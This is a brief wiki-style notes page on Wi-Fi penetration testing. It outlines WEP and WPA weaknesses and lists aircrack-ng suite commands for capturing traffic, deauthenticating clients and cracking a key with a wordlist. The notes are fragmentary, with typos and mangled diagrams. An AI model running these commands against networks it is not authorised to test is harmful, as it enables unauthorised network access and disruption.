Wifi Penetration
The Wifi-Alliance is the worldwide network of companies that brings you Wi-Fi!Protocols
- wep - Wired Equivalent Privacy
Initialization Vector Packet - are clear text and encrypt the next 3 data packets IV ---------> | Access Point | ~~~~~~~~~~~~~~~~~~~~~~~~~~[Victim] Packet Air Crack 64-Bit 50k packets -IV ---> Key password Random Cracked in 10-15mins
- WPA - Wifi Protected Access
- WPA2 -Wifi Protected Access 2
Authentication Header - AES Encrypted (symmetric) [AH] / [AP] [V] / [H]
Techniques
- Option 1
airmon-ng start wlan0 airodump-ng mon0 airodump-ng -c #channelid -w filename --bbsid #(mac address of client) mon0 aireplay-ng -0 0 -a #BSSID mon0 aircrack-ng file -w /pentest/passwords/wordlist/darkcode.lst
Tools, Sources and Links
http://thevikidtruth.com/wiki/?wifipenetration
13dec16 | admin |